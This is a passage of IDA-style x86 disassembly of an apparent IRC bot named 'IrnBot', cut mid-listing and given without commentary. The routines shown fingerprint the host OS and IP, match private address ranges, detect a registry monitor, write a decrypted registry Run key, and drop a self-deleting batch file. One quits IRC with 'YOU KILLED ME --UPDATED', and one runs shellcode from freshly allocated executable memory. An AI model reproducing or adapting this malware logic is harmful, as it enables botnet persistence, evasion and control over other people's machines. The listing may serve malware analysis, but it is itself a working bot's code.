		push	dword_4292CC
		mov	word_4291B6, ax
		call	ds:dword_41E27C	; bind
		test	eax, eax
		jz	short loc_419888

loc_419880:				; CODE XREF: sub_41979F+102j
					; sub_41979F+114j
		push	dword_4292CC
		jmp	short loc_41982B
; ---------------------------------------------------------------------------

loc_419888:				; CODE XREF: sub_41979F+DFj
		push	9
		push	401h
		push	[esp+18h+arg_0]
		push	dword_4292CC
		call	ds:dword_41E22C	; WSAAsyncSelect
		test	eax, eax
		jnz	short loc_419880
		push	4
		push	dword_4292CC
		call	ds:dword_41E230	; listen
		test	eax, eax
		jnz	short loc_419880
		inc	eax
		mov	byte_4293D4, al

loc_4198BB:				; CODE XREF: sub_41979F+94j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_41979F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4198C0	proc near		; DATA XREF: sub_419997+21o

var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h

		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		mov	eax, dword_4291C4
		push	ebx
		mov	ebx, ds:off_41E1F0
		push	esi
		push	edi
		mov	edi, 7F00h
		push	edi
		xor	esi, esi
		push	esi
		mov	[ebp+var_3C], eax
		mov	[ebp+var_28], offset dword_428024
		mov	[ebp+var_48], offset sub_41976B
		mov	[ebp+var_4C], 8
		mov	[ebp+var_50], 30h
		call	ebx ; sub_45914F
		push	edi
		push	esi
		mov	[ebp+var_38], eax
		call	ebx ; sub_45914F
		push	edi
		push	esi
		mov	[ebp+var_24], eax
		call	ds:off_41E208
		mov	[ebp+var_34], eax
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_2C], esi
		mov	[ebp+var_44], esi
		mov	[ebp+var_40], esi
		mov	[ebp+var_30], 1
		call	ds:off_41E1EC
		test	ax, ax
		jz	short loc_41998E
		push	esi
		push	dword_4291C4
		mov	eax, 80000000h
		push	esi
		push	esi
		push	esi
		push	esi
		push	eax
		push	eax
		push	0CF0000h
		push	offset aIrnbot	; "IrnBot"
		push	offset dword_428024
		push	esi
		call	ds:off_41E1F8
		push	eax
		call	sub_41979F
		test	eax, eax
		pop	ecx
		jz	short loc_41998E
		mov	edi, ds:off_41E204
		jmp	short loc_419981
; ---------------------------------------------------------------------------

loc_41996D:				; CODE XREF: sub_4198C0+CCj
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41E1F4
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41E200

loc_419981:				; CODE XREF: sub_4198C0+ABj
		push	esi
		push	esi
		push	esi
		lea	eax, [ebp+var_20]
		push	eax
		call	edi ; sub_44F946
		test	eax, eax
		jnz	short loc_41996D

loc_41998E:				; CODE XREF: sub_4198C0+70j
					; sub_4198C0+A3j
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_4198C0	endp


; =============== S U B	R O U T	I N E =======================================



sub_419997	proc near		; CODE XREF: sub_4024A4+70p
					; sub_41C77E+3C5p
		push	4
		mov	eax, offset loc_41CE29
		call	sub_404B8C
		push	8
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		and	dword ptr [ebp-4], 0
		test	esi, esi
		jz	short loc_4199CB
		push	offset sub_4198C0
		xor	ecx, ecx
		mov	edi, offset aHs	; "HS"
		call	sub_414D0E
		jmp	short loc_4199CD
; ---------------------------------------------------------------------------

loc_4199CB:				; CODE XREF: sub_419997+1Fj
		xor	eax, eax

loc_4199CD:				; CODE XREF: sub_419997+32j
		cmp	dword ptr [eax+4], 0
		setnz	al
		call	sub_404C2B
		retn
sub_419997	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4199DA	proc near		; CODE XREF: sub_419F47:loc_419F6Bp
		mov	eax, dword_4290D0
		mov	edx, dword_4290D4
		lea	ecx, ds:4290D8h[eax*4]
		push	esi
		mov	esi, eax
		mov	eax, dword_4290D8[edx*4]
		add	eax, [ecx]
		and	eax, 3FFFFFFFh
		inc	esi
		cmp	esi, 37h
		mov	[ecx], eax
		jnz	short loc_419A07
		xor	esi, esi

loc_419A07:				; CODE XREF: sub_4199DA+29j
		inc	edx
		cmp	edx, 37h
		jnz	short loc_419A0F
		xor	edx, edx

loc_419A0F:				; CODE XREF: sub_4199DA+31j
		mov	dword_4290D0, esi
		mov	dword_4290D4, edx
		sar	eax, 6
		pop	esi
		retn
sub_4199DA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419A20	proc near		; CODE XREF: sub_401DA7p
					; sub_402129+125p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	ebx
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41E058	; QueryPerformanceCounter
		test	eax, eax
		jz	short loc_419A9C
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E064
		test	eax, eax
		jz	short loc_419A9C
		push	[ebp+var_4]
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+var_10]
		call	sub_41CC00
		push	0
		push	15180h
		push	edx
		push	eax
		call	sub_411DC0
		push	0
		push	0E10h
		push	ebx
		push	ecx
		mov	dword_4290B8, eax
		mov	dword_4290BC, edx
		call	sub_411DC0
		push	0
		push	3Ch
		push	ebx
		push	ecx
		mov	dword_4290C0, eax
		mov	dword_4290C4, edx
		call	sub_41CC00
		mov	dword_4290C8, eax
		mov	dword_4290CC, edx

loc_419A9C:				; CODE XREF: sub_419A20+13j
					; sub_419A20+21j
		pop	ebx
		leave
		retn
sub_419A20	endp


; =============== S U B	R O U T	I N E =======================================



sub_419A9F	proc near		; CODE XREF: sub_402129+EFp
					; sub_41810B+BCp ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	[esp+arg_0]
		push	0
		push	esi
		call	sub_408130
		add	esp, 0Ch
		cmp	[esp+arg_4], 0
		push	[esp+arg_0]
		push	esi
		jz	short loc_419AC1
		push	1002h
		jmp	short loc_419AC3
; ---------------------------------------------------------------------------

loc_419AC1:				; CODE XREF: sub_419A9F+19j
		push	7

loc_419AC3:				; CODE XREF: sub_419A9F+20j
		push	800h
		call	ds:off_41E054
		mov	eax, esi
		retn
sub_419A9F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=74h


sub_419AD1	proc near		; CODE XREF: sub_402129+DAp
					; sub_41810B+8Bp ...

var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= byte ptr -84h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-74h]
		sub	esp, 98h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+74h+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+74h+var_98]
		push	eax
		mov	ebx, ecx
		mov	[ebp+74h+var_98], 94h
		call	ds:dword_41E068	; GetVersionExA
		push	ebx
		xor	edi, edi
		push	edi
		push	esi
		call	sub_408130
		add	esp, 0Ch
		cmp	[ebp+74h+var_94], 6
		jnz	short loc_419B1A
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		push	offset aVis	; "VIS"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B1A:				; CODE XREF: sub_419AD1+3Bj
		cmp	[ebp+74h+var_94], 5
		jnz	short loc_419B46
		cmp	[ebp+74h+var_90], 2
		jnz	short loc_419B2D
		push	offset a2k3	; "2K3"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B2D:				; CODE XREF: sub_419AD1+53j
		cmp	[ebp+74h+var_90], 1
		jnz	short loc_419B3A
		push	offset aXp_0	; "XP"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B3A:				; CODE XREF: sub_419AD1+60j
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		push	offset a2k	; "2K"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B46:				; CODE XREF: sub_419AD1+4Dj
		cmp	[ebp+74h+var_94], 4
		jnz	short loc_419B85
		cmp	[ebp+74h+var_90], 5Ah
		jnz	short loc_419B59
		push	offset aMe	; "ME"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B59:				; CODE XREF: sub_419AD1+7Fj
		cmp	[ebp+74h+var_90], 1
		jnz	short loc_419B66
		push	offset a98	; "98"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B66:				; CODE XREF: sub_419AD1+8Cj
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		cmp	[ebp+74h+var_88], 2
		jnz	short loc_419B78
		push	offset aNt	; "NT"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B78:				; CODE XREF: sub_419AD1+9Ej
		cmp	[ebp+74h+var_88], 1
		jnz	short loc_419B97
		push	offset a95	; "95"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B85:				; CODE XREF: sub_419AD1+40j
					; sub_419AD1+6Cj ...
		push	offset aUnk	; "UNK"

loc_419B8A:				; CODE XREF: sub_419AD1+47j
					; sub_419AD1+5Aj ...
		lea	eax, [ebx-1]
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 0Ch

loc_419B97:				; CODE XREF: sub_419AD1+ABj
		mov	eax, esi
		lea	edx, [eax+1]

loc_419B9C:				; CODE XREF: sub_419AD1+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419B9C
		sub	eax, edx
		cmp	[ebp+74h+arg_0], cl
		mov	[eax+esi], cl
		jz	loc_419C33
		push	ebx
		call	sub_402BD6
		mov	edi, eax
		push	edi
		call	sub_402FD3
		push	eax
		push	0
		push	edi
		call	sub_408130
		add	esp, 14h
		push	[ebp+74h+var_8C]
		lea	eax, [ebp+74h+var_84]
		push	[ebp+74h+var_90]
		push	[ebp+74h+var_94]
		push	eax
		push	esi
		push	offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 20h
		lea	ecx, [eax+1]

loc_419BF5:				; CODE XREF: sub_419AD1+129j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419BF5
		push	ebx
		sub	eax, ecx
		push	0
		push	esi
		mov	[eax+edi], dl
		call	sub_408130
		push	edi
		push	offset aS_6	; "%s"
		dec	ebx
		push	ebx
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419C20:				; CODE XREF: sub_419AD1+154j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419C20
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		call	sub_403129
		pop	ecx

loc_419C33:				; CODE XREF: sub_419AD1+DAj
		mov	ecx, [ebp+74h+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, esi
		pop	ebx
		call	sub_402C9E
		add	ebp, 74h
		leave
		retn
sub_419AD1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419C46	proc near		; CODE XREF: sub_401DED+50p
					; sub_402129+FEp ...

var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	edi
		xor	eax, eax
		lea	edi, [ebp+var_18]
		stosd
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_0]
		mov	[ebp+var_1C], 10h
		call	ds:dword_41E238	; getsockname
		movzx	eax, [ebp+var_11]
		push	eax
		movzx	eax, [ebp+var_12]
		push	eax
		movzx	eax, [ebp+var_13]
		push	eax
		movzx	eax, [ebp+var_14]
		push	eax
		push	offset aD_D_D_D_0 ; "%d.%d.%d.%d"
		push	0Fh
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419CA9:				; CODE XREF: sub_419C46+68j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419CA9
		sub	eax, ecx
		mov	ecx, [ebp+var_8]
		mov	[eax+esi], dl
		xor	ecx, ebp
		mov	eax, esi
		pop	edi
		call	sub_402C9E
		leave
		retn
sub_419C46	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419CC4	proc near		; CODE XREF: sub_4024A4+10Cp
					; sub_4182F6+A5p ...

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, ecx
		mov	cl, [eax]
		test	cl, cl
		push	edi
		jz	short loc_419D2D

loc_419CD2:				; CODE XREF: sub_419CC4+24j
		mov	dl, [esi]
		cmp	dl, 2Ah
		jz	short loc_419CEA
		cmp	dl, cl
		jz	short loc_419CE2
		cmp	dl, 3Fh
		jnz	short loc_419D08

loc_419CE2:				; CODE XREF: sub_419CC4+17j
		inc	esi
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419CD2

loc_419CEA:				; CODE XREF: sub_419CC4+13j
		mov	cl, [eax]
		test	cl, cl
		jz	short loc_419D2D
		mov	edi, [ebp+var_4]

loc_419CF3:				; CODE XREF: sub_419CC4+5Fj
		mov	dl, [esi]
		cmp	dl, 2Ah
		jnz	short loc_419D0C
		inc	esi
		cmp	byte ptr [esi],	0
		jz	short loc_419D27
		mov	[ebp+var_4], esi
		lea	edi, [eax+1]
		jmp	short loc_419D1F
; ---------------------------------------------------------------------------

loc_419D08:				; CODE XREF: sub_419CC4+1Cj
		xor	eax, eax
		jmp	short loc_419D39
; ---------------------------------------------------------------------------

loc_419D0C:				; CODE XREF: sub_419CC4+34j
		cmp	dl, cl
		jz	short loc_419D1D
		cmp	dl, 3Fh
		jz	short loc_419D1D
		mov	esi, [ebp+var_4]
		mov	eax, edi
		inc	edi
		jmp	short loc_419D1F
; ---------------------------------------------------------------------------

loc_419D1D:				; CODE XREF: sub_419CC4+4Aj
					; sub_419CC4+4Fj
		inc	esi
		inc	eax

loc_419D1F:				; CODE XREF: sub_419CC4+42j
					; sub_419CC4+57j
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419CF3
		jmp	short loc_419D2D
; ---------------------------------------------------------------------------

loc_419D27:				; CODE XREF: sub_419CC4+3Aj
		xor	eax, eax
		inc	eax
		jmp	short loc_419D39
; ---------------------------------------------------------------------------

loc_419D2C:				; CODE XREF: sub_419CC4+6Cj
		inc	esi

loc_419D2D:				; CODE XREF: sub_419CC4+Cj
					; sub_419CC4+2Aj ...
		cmp	byte ptr [esi],	2Ah
		jz	short loc_419D2C
		xor	eax, eax
		cmp	[esi], al
		setz	al

loc_419D39:				; CODE XREF: sub_419CC4+46j
					; sub_419CC4+66j
		pop	edi
		pop	esi
		leave
		retn
sub_419CC4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419D3D	proc near		; CODE XREF: sub_41A0A7+14Ap

var_23C		= byte ptr -23Ch
var_23B		= byte ptr -23Bh
var_13C		= byte ptr -13Ch
var_13B		= byte ptr -13Bh
var_3C		= byte ptr -3Ch
var_3B		= byte ptr -3Bh
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 23Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		push	37h
		lea	eax, [ebp+var_3B]
		push	ebx
		push	eax
		mov	[ebp+var_3C], bl
		call	sub_408130
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_23B]
		push	ebx
		push	eax
		mov	[ebp+var_23C], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_13B]
		push	ebx
		push	eax
		mov	[ebp+var_13C], bl
		call	sub_408130
		add	esp, 24h
		push	100h
		lea	eax, [ebp+var_13C]
		push	eax
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		lea	eax, [ebp+var_13C]
		push	eax
		push	eax
		lea	eax, [ebp+var_23C]
		push	offset a@echoOff1DelSI ; "@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
		push	eax
		call	sub_403643
		push	104h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		add	esp, 18h
		dec	eax
		push	eax
		push	esi
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_4038F1
		push	0Ah
		pop	ecx
		cdq
		idiv	ecx
		lea	eax, [ebp+var_3C]
		push	edx
		push	esi
		push	offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
		push	eax
		call	sub_403643
		push	esi
		call	sub_403129
		lea	eax, [ebp+var_3C]
		push	offset aW	; "w"
		push	eax
		call	sub_403782
		mov	esi, eax
		add	esp, 30h
		cmp	esi, ebx
		jz	short loc_419E8B
		lea	eax, [ebp+var_23C]
		push	eax
		push	offset aS_7	; "%s"
		push	esi
		call	sub_403795
		push	esi
		call	sub_403A52
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_3C]
		push	eax
		push	ebx
		push	ebx
		call	ds:dword_41E1E0

loc_419E8B:				; CODE XREF: sub_419D3D+122j
		mov	ecx, [ebp+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_419D3D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419E99	proc near		; CODE XREF: sub_41C4C0+199p
					; sub_41C77E+1C1p

var_16C		= dword	ptr -16Ch
var_168		= byte ptr -168h
var_124		= dword	ptr -124h
var_120		= byte ptr -120h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 170h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	40h
		lea	eax, [ebp+var_168]
		push	ebx
		push	eax
		mov	[ebp+var_16C], ebx
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_124], ebx
		lea	edi, [ebp+var_120]
		stosd
		stosd
		mov	esi, 103h
		push	esi
		stosd
		lea	eax, [ebp+var_113]
		push	ebx
		push	eax
		mov	[ebp+var_114], bl
		call	sub_408130
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_114]
		push	esi
		push	eax
		call	sub_4039C4
		add	esp, 28h
		lea	eax, [ebp+var_124]
		push	eax
		lea	eax, [ebp+var_16C]
		push	eax
		push	ebx
		push	ebx
		push	28h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_114]
		push	eax
		push	ebx
		call	ds:dword_41E05C	; CreateProcessA
		mov	ecx, [ebp+var_8]
		test	eax, eax
		pop	edi
		setnz	al
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_419E99	endp

; ---------------------------------------------------------------------------
		push	0
		call	sub_403ACE
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================



sub_419F47	proc near		; CODE XREF: sub_413FED+81p
					; sub_413FED+94p ...
		push	esi
		mov	esi, eax
		xor	eax, eax
		inc	eax
		sub	eax, ebx
		add	esi, eax
		cmp	esi, 1
		jg	short loc_419F5A
		mov	eax, ebx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_419F5A:				; CODE XREF: sub_419F47+Dj
		push	2
		pop	eax
		cmp	esi, eax
		jle	short loc_419F67

loc_419F61:				; CODE XREF: sub_419F47+1Ej
		add	eax, eax
		cmp	eax, esi
		jl	short loc_419F61

loc_419F67:				; CODE XREF: sub_419F47+18j
		push	edi
		lea	edi, [eax-1]

loc_419F6B:				; CODE XREF: sub_419F47+2Dj
		call	sub_4199DA
		and	eax, edi
		cmp	eax, esi
		jge	short loc_419F6B
		pop	edi
		add	eax, ebx
		pop	esi
		retn
sub_419F47	endp


; =============== S U B	R O U T	I N E =======================================



sub_419F7B	proc near		; CODE XREF: sub_4024A4+420p
					; sub_413FED:loc_414501p ...
		and	dword_4290D0, 0
		push	0
		mov	dword_4290D4, 1Fh
		call	sub_403ACE
		mov	edx, 3FFFFFFFh
		and	eax, edx
		pop	ecx
		mov	dword_4290D8, eax
		mov	dword_4290DC, 1
		mov	eax, offset dword_4290D8
		push	esi

loc_419FB0:				; CODE XREF: sub_419F7B+48j
		lea	ecx, [eax+4]
		mov	esi, [ecx]
		add	esi, [eax]
		and	esi, edx
		mov	[eax+8], esi
		mov	eax, ecx
		cmp	eax, offset dword_4291AC
		jl	short loc_419FB0
		pop	esi
		retn
sub_419F7B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419FC7	proc near		; CODE XREF: sub_41810B+E6p
					; sub_41B3E7+381p

var_24		= byte ptr -24h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	dword_4294DC
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_419C46
		pop	ecx
		mov	eax, esi
		mov	ecx, offset a192_168__ ; "192.168.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	loc_41A097
		mov	eax, esi
		mov	ecx, offset a10___ ; "10.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A097
		mov	eax, esi
		mov	ecx, offset a111___ ; "111.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A097
		mov	eax, esi
		mov	ecx, offset a15___ ; "15.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A097
		mov	eax, esi
		mov	ecx, offset a16___ ; "16.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A097
		push	10h
		pop	esi

loc_41A04E:				; CODE XREF: sub_419FC7+CAj
		xor	eax, eax
		lea	edi, [ebp+var_24]
		stosd
		stosd
		stosd
		push	esi
		push	offset a172_D__	; "172.%d.*.*"
		stosd
		lea	eax, [ebp+var_24]
		push	0Fh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_24]
		add	esp, 10h
		lea	edx, [eax+1]

loc_41A071:				; CODE XREF: sub_419FC7+AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A071
		sub	eax, edx
		mov	[ebp+eax+var_24], cl
		lea	eax, [ebp+var_14]
		lea	ecx, [ebp+var_24]
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A097
		inc	esi
		cmp	esi, 1Fh
		jbe	short loc_41A04E
		xor	al, al
		jmp	short loc_41A099
; ---------------------------------------------------------------------------

loc_41A097:				; CODE XREF: sub_419FC7+3Ej
					; sub_419FC7+52j ...
		mov	al, 1

loc_41A099:				; CODE XREF: sub_419FC7+CEj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_419FC7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A0A7	proc near		; CODE XREF: sub_41C4C0+1C5p

var_2A8		= byte ptr -2A8h
var_2A0		= dword	ptr -2A0h
var_29C		= dword	ptr -29Ch
var_298		= dword	ptr -298h
var_294		= dword	ptr -294h
var_290		= dword	ptr -290h
var_28C		= byte ptr -28Ch
var_28B		= byte ptr -28Bh
var_1CC		= byte ptr -1CCh
var_1CB		= byte ptr -1CBh
var_CC		= byte ptr -0CCh
var_CB		= byte ptr -0CBh
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 2A8h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_298], eax
		lea	eax, [ebp+var_CB]
		push	ebx
		push	eax
		mov	[ebp+var_CC], bl
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28B]
		push	ebx
		push	eax
		mov	[ebp+var_28C], bl
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	edi, [ebp+var_CC]
		call	sub_41C177
		pop	ecx
		inc	esi
		push	esi
		mov	eax, edi
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28C]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	0FFh
		lea	eax, [ebp+var_1CB]
		push	ebx
		push	eax
		mov	[ebp+var_1CC], bl
		call	sub_408130
		mov	eax, dword_437E4C
		mov	eax, [eax]
		mov	[ebp+var_290], eax
		mov	eax, offset dword_437E48
		add	esp, 0Ch
		mov	[ebp+var_294], eax
		mov	[ebp+var_2A0], eax

loc_41A160:				; CODE XREF: sub_41A0A7+102j
		mov	eax, dword_437E4C
		lea	edi, [ebp+var_2A0]
		lea	esi, [ebp+var_294]
		mov	[ebp+var_29C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_41A1B7
		mov	edi, offset aRegistryMonito ; "Registry	Monitor"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	11h
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [ebp+var_294]
		jz	short loc_41A1AB
		lea	edi, [ebp+var_2A8]
		call	sub_40166F
		jmp	short loc_41A160
; ---------------------------------------------------------------------------

loc_41A1AB:				; CODE XREF: sub_41A0A7+F5j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86

loc_41A1B7:				; CODE XREF: sub_41A0A7+D7j
		mov	edi, 100h
		push	edi
		lea	esi, [ebp+var_1CC]
		mov	ebx, offset aTdvIStdIvd	; "»’¤¢´³¨µ¸á’¤³·¨¢¤"
		call	sub_41A301
		pop	ecx
		mov	eax, esi
		push	eax
		push	offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		call	sub_417BB2
		add	esp, 0Ch
		push	edi
		mov	eax, esi
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		call	sub_419D3D
		push	[ebp+var_298]
		mov	edi, offset dword_4294DC
		push	offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		push	0
		call	ds:off_41E050
		int	3		; Trap to Debugger
		jmp	ds:off_41E08C
sub_41A0A7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A21C	proc near		; CODE XREF: sub_41C77E+31p

var_18		= byte ptr -18h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		call	ds:dword_41E0C8	; GetCurrentProcess
		mov	esi, offset dword_421880
		lea	edi, [ebp+var_10]
		movsd
		movsd
		push	40h
		push	3000h
		movsb
		push	6
		mov	ebx, eax
		xor	edi, edi
		push	edi
		lea	eax, [ebp+var_18]
		push	ebx
		mov	[ebp+var_10+3],	eax
		call	ds:dword_41E0BC	; VirtualAllocEx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_41A265

loc_41A261:				; CODE XREF: sub_41A21C+58j
		xor	al, al
		jmp	short loc_41A298
; ---------------------------------------------------------------------------

loc_41A265:				; CODE XREF: sub_41A21C+43j
		push	edi
		push	40h
		push	6
		push	esi
		push	ebx
		call	ds:dword_41E0C0	; VirtualProtectEx
		test	eax, eax
		jnz	short loc_41A261
		mov	eax, [ebp+var_10]
		mov	[esi], eax
		mov	eax, [ebp+var_C]
		mov	[esi+4], eax
		call	esi	; send
		push	8000h
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41E0C4	; VirtualFreeEx
		cmp	[ebp+var_13], 0D0h
		setnbe	al
